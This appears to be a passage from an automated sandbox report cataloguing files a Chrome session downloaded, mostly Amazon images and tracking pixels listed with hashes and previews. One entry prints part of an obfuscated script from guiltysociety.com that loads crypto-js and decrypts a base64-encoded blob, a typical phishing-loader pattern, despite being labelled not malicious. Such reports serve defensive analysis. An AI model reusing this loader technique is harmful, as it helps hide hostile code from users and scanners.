                                                                                                                                                                                                                                                                      Size (bytes):4764
                                                                                                                                                                                                                                                                      Entropy (8bit):5.111522830106369
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:IdNUzrqJcrr+09EbtGeSDOwMFyUfay0uqYb40STfKAHSTfXAh4MPhzpU:Iszrgc+09Ej+lMFyUyyA84fKAAXAh4MI
                                                                                                                                                                                                                                                                      MD5:0817B19A62B4C6905229112292682F30
                                                                                                                                                                                                                                                                      SHA1:43B95951A43C974BB91D9465B0230E3260D60811
                                                                                                                                                                                                                                                                      SHA-256:CB950CC364F3BAA19558C30C46E3C3A9C6C1926D9C4DC72B5FD7A02C6F064C7F
                                                                                                                                                                                                                                                                      SHA-512:20B650E6687557299F70E143094511D072A576EC9C4F93AAE8BB75EEABED2EDF4C3E458A534E8F90F0D350545E317BAAE5D1D91B591DE906A89FC7CDE475199A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DREz88vUB1bF630ZNVKUQFtQAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICD-zm4e%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D
                                                                                                                                                                                                                                                                      Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DREz88vUB1bF630ZNVKUQFtQAAAGRdjK03wMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICD-zm4e%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-right-7&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; top: 2px; right: 0px; display: inline-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 132 x 235, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13199
                                                                                                                                                                                                                                                                      Entropy (8bit):7.954935066574483
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:rH0E+WSNeZU6PNg1A0KxVaF5bXXt7qYs9lcCHihS5WC9tEAxvVy4yK+ezneiTs4Q:rHpXSJSNg1A0KxC5jUDcvuLxvQlziLI
                                                                                                                                                                                                                                                                      MD5:4AB8824103871D92816E2A084A05949B
                                                                                                                                                                                                                                                                      SHA1:85C43DB1559578D308AE8CEE328CC4483352A649
                                                                                                                                                                                                                                                                      SHA-256:958E3858A8659187AD3BC8E723E0C6A1C2415C6AE40023B40CD0289D0E2DF366
                                                                                                                                                                                                                                                                      SHA-512:A5705C4177AC542244E6BA77BEDFC19BB69823B16206A1C086A2719DB9239222B8DAA0F808B6535BFCB479D0504C63E1597594D8FC2F9AE7DB03F0AE72242DE6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/sash/x6ok$LYiGGUKJXl.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...............>(....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b3e090dd-84c4-4674-9fe3-59f5a5bd6db7" xmpMM:DocumentID="xmp.did:AB1D71FA873C11E6A935C06C3689B1A4" xmpMM:InstanceID="xmp.iid:AB1D71F9873C11E6A935C06C3689B1A4" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f301801f-ea81-4562-919b-633c17b77694" stRef:documentID="adobe:docid:photoshop:9b6ca99e-cfa6-1179-9606-c490b53d51cf"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Z..k../.IDATx..}.x
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3AbrowserQuiteLd%26pc%3D7767%26at%3D7767%26t%3D1724264961803%26csmtags%3DbrowserQuiteLd%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:7766
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x262, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):28737
                                                                                                                                                                                                                                                                      Entropy (8bit):7.98094725469577
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Jsin0rFh+3pVWgWid6plym6w7PUPp3ApEThPcEof:J5n0rzcWgWid6plz6GPUPZAkEEi
                                                                                                                                                                                                                                                                      MD5:A9CD6D74059D34A88096BA0B688528DB
                                                                                                                                                                                                                                                                      SHA1:2503BCD6E157299C30C14ED2394B594B6CD29D70
                                                                                                                                                                                                                                                                      SHA-256:A0EDEC95E9A0C0F0A99B45CD7409A4827E94E5F3E023D3F58826E450C625B9D3
                                                                                                                                                                                                                                                                      SHA-512:2359B2605C94FD170359FE36B494A3740A9260EE9B7C428B9CB7EEB4485A0571E1FDBE13A9EE5113FA3738B4A558B01A6CF05A6AB31A96E2629034FF481F1F2F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........6...................................................................$.$.$.$.$.$.$..(....4...-.`.4.8vs.D...$.$.$.$.$.$.$.*.s'..Fy.\..x.......`.A..s.T.Y|.x/K...u}.9.NY.{+qa.S..hz0B.Y_....;.".....$.O..h.:Jo2....o.Z.:..Y.j.H..z....3.BV...K.......E...'...G.2&:"._.;....}.z.7C.......C.@.r.i.........5>.H.b....;..[....=..Ll{m.7..........0.f...ZN..V$q.v..X4.~%..^}5..S..o\.W\.f..~5e....\....co....i.....!.XYN.-..t.g..k..)3,.Y.f..Bj8l|=..nU;}n:}..=...t.?I..,>..z.......th.......0.. ..53.;E.8.V..+.#...._~d.b....!39.6..L...(.WM.......9.b..,...X......_.=.`.x.<...Y..0k....=9o_.9pl*#.e..L.. ...mc....6y_>..........{5..s..G.%..f.4....)...#v..S.IsO=.h..+.UV.W"tKv..7.+<.M.Y.N......t.o;..d=..Z...h.....D.=..c...._....E%...fp;...M.L}...v.73.m.y.3.6._.-...=Q.L.....#.;.)s=.5....SM.fD.....{..{I.~.$..i.?.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 167x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11086
                                                                                                                                                                                                                                                                      Entropy (8bit):7.957933249968999
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:qk/yQh/2AkwRhFDPLTAFEAmCT+NJa3Y3TY4ukU0hvEuMI6J5n7X1Y0IDbSz68sMN:qk/ygXPLUFJmCTq0S7ukU+suJ6z7X9Iu
                                                                                                                                                                                                                                                                      MD5:1180FD3CE0DA7052A0D1AC809D95CA2D
                                                                                                                                                                                                                                                                      SHA1:E9F4CF0B2D2AE0D9EBC88818A2B224D2E79C41C9
                                                                                                                                                                                                                                                                      SHA-256:B0C58DF29283B0AC43261515DDBC4FFCB722760F9D09E8D5203F394511969FB1
                                                                                                                                                                                                                                                                      SHA-512:DDCF38826EE2DFEBA7E42C461BA096A237A66DEF651ABB536AFBA2BB1F16EB97243C76C282A84DFA235E136385B6C28785D8000C71435DBA300055E56493B18B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71L9xtDPoLL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ.#2aqBr......34Rs.....Cb....S..Td....$%t..................................................!.1.Aq2Qa.....r..#$34...............?..x.*........rg~f..?....5?..>..."..".....o.....M...$..rN.X1..Q....'..............h.^ .>..[....@.\z.":..O.s....p.f.p.M..H.e|.l.......x..~...V.~........G..o.|.................S.>..~...ApN...K..>..?....]E.....,g...[.N..@7....4.....a..8..r..`....K"..D.*H....2.@;..A......|..F..`...t..Es.?.!...o......=^..C.o......._....K].x.=$.J1.~....{.I.B......t.>.......<...W*.}[..n:..+.[.w1....uGco..O/+...m.....Qq`.,...X+.....I..........u..O...k...=-S.R...2.t.G..........2..&.....p.. M..1.....S.%.Z7....'.....[.....a..=.....V"......~W.o..p.x..(.{.7.X...'.Q...GC_}H..O...>M...B)p...'.|~..j.#.Pr......W..|..?..E.>.I....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):18723
                                                                                                                                                                                                                                                                      Entropy (8bit):7.956941869354116
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:4RKHctWFrWFqkOxtiLsj4wNgnoGuPp4uM5kTei3CQZ1wovslfj38:cXtWhWFqkOesjxgq4uM5kTNCQZ1wWmjs
                                                                                                                                                                                                                                                                      MD5:34920E91509021B96CDE281737169CBD
                                                                                                                                                                                                                                                                      SHA1:8056D188363FFB95B8087E9407807645BCD9DB8C
                                                                                                                                                                                                                                                                      SHA-256:BB4098A835DE98AE838E03BD9A5137D1C826FBA01AD74EA812F44ABE41D506CC
                                                                                                                                                                                                                                                                      SHA-512:134D093DDDF58D4D4221B8E9F0C403408F54E791AD35B602CE4DABED8C5E23B8384D85522AE717895590BE8AC3DC8BF04BBD7382F78D5B23656A4C5F3B4FC906
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......,.@.."..........6........................................................................Ne.......s.[G...& -...s.w..{~..|?..i=....=.0H...ZzL..az.3.....{.U..........)..|.....7..._).*#.r....z.....{..t5....,.s.St9p.....9..Z...;......e.Y7.,r9#..H........Q..0ky.........d.,.k...u_)..........]..u.6$O..G..{x,../.:..|..xL..B$Z.y.C...-.j..u.... ........JS.s.^aJ....qT.....6.d..G....j.....-...~....._=........X.....=...;/.{(./..5.........+dV..-..Y.......\.%V.m.+b...V..>.^.$Gv..dyl.s....n...]..Bh....&.....a.V...{ItW.K.4]..n.J.....^Xp.W./.e....`g.m..I..wUq...cU[...7.R....K.#.b`".:.....1.v.....?...\.V).f.u._..".f.s...x..E.-.{V_@..\..........~a.Y#...z.:.N.....U..a.Q.oo>....(k...)l....5.Nq.].V....e....v}...${V.F..k!...p.H.m.a...K5....@...s..S.D.".l... .k6.liQ_WF.f<.&..>..*..*.\..bd..2Y..*......66...s
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):34472
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969048625455795
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1CLk/CtJDxuqcQffQl6mL5IIae6MjEnzAVFtGx1s9JbC8onGWv:WJjsqcYfQl6mFIIay4nzAVFMx1WJbOGY
                                                                                                                                                                                                                                                                      MD5:0D8FAF9D6E68111A92BF63C524D047A2
                                                                                                                                                                                                                                                                      SHA1:372753D7B75869BD184F797EE6C15CE2D1244BBC
                                                                                                                                                                                                                                                                      SHA-256:C921A354593AD6934C8B7396E92022CA70217CCF33BE5A5F4A2D9CCE688911F4
                                                                                                                                                                                                                                                                      SHA-512:7CA1EBE99949DAD4DEA87CC248B2F140DF94A756F9A0C066FBDF3564A9E8A0DDABEF445395EEC0E13D5D6EC1E8FB9F3FECD6F4A39BC061F457C4AD05FB7750AC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................EW..(.s......M....... ....+.U..p"..D...&.Z.\K.........H.{.E{.QG>..B.u.Fm...=..........$.."...gn...iq....^.\C.. ....Q_e...+.....e.?m<94....#.....G.#ot.#....um.U..b...#.=...h .....lM..(pR....k.,N..sN..N..O.Z..Inlt..L.9.C.I..r.<.U.........K.z2:2y[......fMNv.>V...#..G.W4#.[y.E;..e.k...X....5....69Z.y.=}.+..%...Q".g].5]..v..9.{..R..<....<..X.;Q.g.(.j.Dkvv.|.....^..k.V;...\...t#..yLL.PG....r..4.......:-.....f..6E.-M.80.b.rn.1...K.W+k.'.$.c9...s....r..-....:;8..K..3S.J<H.F.<t...F..f6.1c...V..:=..#.....7ws.Fj.7..qA._Qt.....KB.u....J.....fs:...'F...I.p.,..4...L.E...G..]$.aq..........FL^7.......:^3..o'..b6F.m>.V........R......#.......Z..6._..gE.:.@.Uh..UnBg.=.^+.t....Un'...=..w....]Z.r....A.F...C7.f.'e.&;N.....,...4....5..nS....t...`..DY0`..U..._t...s.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):24358
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9289530989980355
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:8vtpoU0lr5dEvVxBgj3nZMusal0hUW1gsZQmxUUEpDyiyjYqrNx:67o9NenBg1MuBlbWh2mwpDnyMqz
                                                                                                                                                                                                                                                                      MD5:49FCFBD51ADA5F6628EB1D0B0DBC2ED4
                                                                                                                                                                                                                                                                      SHA1:C94C018BAEC586CBBB8455483360118AE00E995F
                                                                                                                                                                                                                                                                      SHA-256:61044EF9C0F9B1148B6196ED173FFBB83A6B030E68B7EAF15D1BF8426F824F7E
                                                                                                                                                                                                                                                                      SHA-512:91D14D82876A5BCB1A0C431699B6C7FD098FFFAEF2F9871B4262712B5B2C79DC58439690615DC927D2044424863F3D4B6E3010012A01AEE4B85EF96603CF3370
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................E..............................!."1.Q.#..2Aaq.3...$4Bu...%&'5:.ev....................................;........................!1..AQ."aq...#2B.....3R..$bCSr..............?..C...1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a...w!..g..~.C.3..ITu... ..{...%..)y%Q.....`..m.I..+p,..[HH...{...O.1*....-.....FR..KH6@N%L...B.$..A.m.../x......Z..rF....#l.D........H..l....iB...>S]...."d^GW..X.%..k,4[...p.6.7..=x'.xS.v..L.u.c7.6.6...Z....j`....Z....6:"&...:=...C.....|..R.....q.3H..r....0.Q$`.m..V.....k......t..[...gE.w....S7d...+.rR..U5e.W..QE...b.I4....S.F.k.).v.l^.o.X.lSJ.km..6KVnJ..qa. .2A..v..U\8b.F.......g....r.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 350 x 450, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):14256
                                                                                                                                                                                                                                                                      Entropy (8bit):7.935047719221589
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:lxTA3vdo5DGwFf8U5JHP0gRUTKDrbymGanXyR5LdY/JBO:lxTAcGS0g6gRU+DK2nX02/JE
                                                                                                                                                                                                                                                                      MD5:64224EC939AC0B3487645C4E109030D5
                                                                                                                                                                                                                                                                      SHA1:B5AC2A7BC2AF1C9226987439F34BA8D4A79FBF0B
                                                                                                                                                                                                                                                                      SHA-256:2818F0BCCC7DDAA8E893C4655473D82589146DCC6E7AA6F78CEB9B3D4440C809
                                                                                                                                                                                                                                                                      SHA-512:9E2F8F391CA83B4DBD4170F91B30268F81D7F570E042699BD73135EA60BF3AE5AAA343F5BAE91430879DCF305914646499A6EF24C2E3CA604460585C3CCA7E31
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...^..........QQ.....gAMA......a.....sRGB.........PLTEGpL...........................................................................................I..C..............................................................3..........................2...........-...............................................2........2..*...........3..2.....2...........1..2..........................2w.............2...w........v.......2.....-.....2............w....2.....2w........w....2..2..2.....3...$$$.....2...........2......w....2...w..222..2........2............w.......2.........333..........g.......8...........?R ...v..***...333v..v..............v..................f..e....222...................n....v.....222.f..e.......222.e.....g..d.........3......w.."/?.f....333.............r....~..1=L[..s.....mu.......Q[h...[eqdmx;GT\|......tRNS........@..........'`..<.F.Q......c.pD...+..0.#3wJ.........m.^[...7_..V.....N.....s....fA...../...{..|N....j..l..-Mv&i.9#..~..$...6i...e9...D.y0xy/...zG..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1377), with CRLF line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):2020
                                                                                                                                                                                                                                                                      Entropy (8bit):5.9566253563574785
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:gFd7bQRAq9t6qrDlTkNnwWAk8RsNlMT5OBaS+zHVkbpuIBVNwANpT:gFdI53kRwWM2lIOBaL1IuIFN
                                                                                                                                                                                                                                                                      MD5:EBC9CD19CB0ADB81B4EC202E8E032F45
                                                                                                                                                                                                                                                                      SHA1:7219F0881A629B1B6F6B8D8634D028A5F723714F
                                                                                                                                                                                                                                                                      SHA-256:D686DE720F425E68D966ADE654BD8C047BC4644BD82709C54EA4E5D8520E3201
                                                                                                                                                                                                                                                                      SHA-512:C8F0B5E04185B62700CF4537C1B775E90583C496E1C799D26947DA855310527C7E60F612235F09663B56287A92795FAF05C91F934AD7FC3EE4EFADE0D0CDE6C2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://guiltysociety.com/sass/res444.php?2-68747470733a2f2f687265662e6c692f3f68747470733a2f2f37435a68382e6372696d6974692e636f6d2f336171792f-abyssinian
                                                                                                                                                                                                                                                                      Preview: var tQQQBcqEamyBGmKi = document.createElement("script");..tQQQBcqEamyBGmKi.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(tQQQBcqEamyBGmKi);..tQQQBcqEamyBGmKi.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiMVRJQUlcLzlIWGZ6N1ZEWWJmYUU3VFRaXC82eFp0REw1QmFxeFhzWXNmUjRRUFExVlcySUYzcmtXZ0YyejhCT2NQaWtTYXFSVFNMVXJGZmd6aFF4Y1I4cWFFWUVOOUczOVZXM2lsTUY1VThDN1dcLzVZNlJITlwvNnZLbHFJaVVuallZZ0k0dlhQYzczaEZqc1puSzN1dlwvZ3lFa1dHXC9iUXY2bDZtdmVuM1hNdk9pWkVoWTVpVnpYcDY5K1ZZTWY0cUdEa1VTaXhmNUlyeG4xekNyeitJV1I5eHZsNGNjRWcwNkNpRmpzUEtIN0NIVjhMYjN3a09rc29aM3RxWlcwV2VDelBHM1FaQVRlNThidU5WdzZiWWlCMXE5UElTeWd6cWlFYm12aTZoZmhoMjQ1WUhHYktcL3lkcHZNNGpjV1B2NDBXOFdGaXhKeXhqV2xKTllLQW5HRmRcL0M3Q0ltblwvUEhZM3JsbFVFNzgwQm8wNmpYbWsxbTFIRmVUSGViTjlSZE5QWStRS3o3UUpvTHprQXZhYXJRRnc0c2xxVlVIb21tb0J2eXFHT3hTckpuTXJmRytydm5hOVV2SnMzRGJxYjFuTjNoVkZsUnMxenBWNDdGY3llK2FEQU1IV1wvNEFrXC9uU1ZEdldrdzl3M1hlOExOMDdaN3J3ajBkSnlIbW5henIycHFScDI3T3
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1044
                                                                                                                                                                                                                                                                      Entropy (8bit):5.317557604776751
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:24:tVgL6OR0UH8Z0o4e+orenR0UH8Z0o4uPuTwFlnJHxlLS2xke:gdSUcprenSUcXFlnJHfS2xke
                                                                                                                                                                                                                                                                      MD5:A6C4BEE9F3055C3D8ACB06E6C972C3A8
                                                                                                                                                                                                                                                                      SHA1:69A03366483ED90F268D806FA6B87A3C3E94C540
                                                                                                                                                                                                                                                                      SHA-256:0BAD480FC8B650C5EDDC4CB8CEBC211529E90853CB36C30D21929982726CCC1C
                                                                                                                                                                                                                                                                      SHA-512:2507A279FD1F91F14942267BA7317DE2D08A3EFA7959DAEC6307E67A33A73FADC980853CC5C2F7FA0181977D04169499A7CA98697A02702D14902626D4C5C636
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/39/perc/star-halffill.svg
                                                                                                                                                                                                                                                                      Preview:<svg version="1.1" xmlns="http://www.w3.org/2000/svg" focusable="false" aria-hidden="true" viewBox="0 0 19 19" shape-rendering="geometricPrecision"><path d="M9.5,1.325L12.104,6.581L17.922,7.423L13.711,11.511L14.706,17.286L9.5,14.56L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.5,1.325Z" style="fill:white"></path><path d="M9.49,1.345L9.49,14.565L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.49,1.345Z" style="fill:url(#_starGradient_5pm7gjqod)"></path><path d="M9.5,1.325L12.104,6.581L17.922,7.423L13.711,11.511L14.706,17.286L9.5,14.56L4.293,17.286L5.288,11.511L1.077,7.423L6.895,6.581L9.5,1.325Z" style="fill:none;stroke:rgb(162,106,0);stroke-width:1"></path><defs><linearGradient id="_starGradient_5pm7gjqod" x1="0" y1="0" x2="1" y2="0" gradientUnits="userSpaceOnUse" gradientTransform="matrix(7.07124e-16,11.5482,-11.5482,7.07124e-16,9.4995,5.53952)"><stop offset="0" style="stop-color:rgb(255,206,0);stop-opacity:1"></stop><stop offset="1" style="stop-color:rgb(255,167,0);stop-opac
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
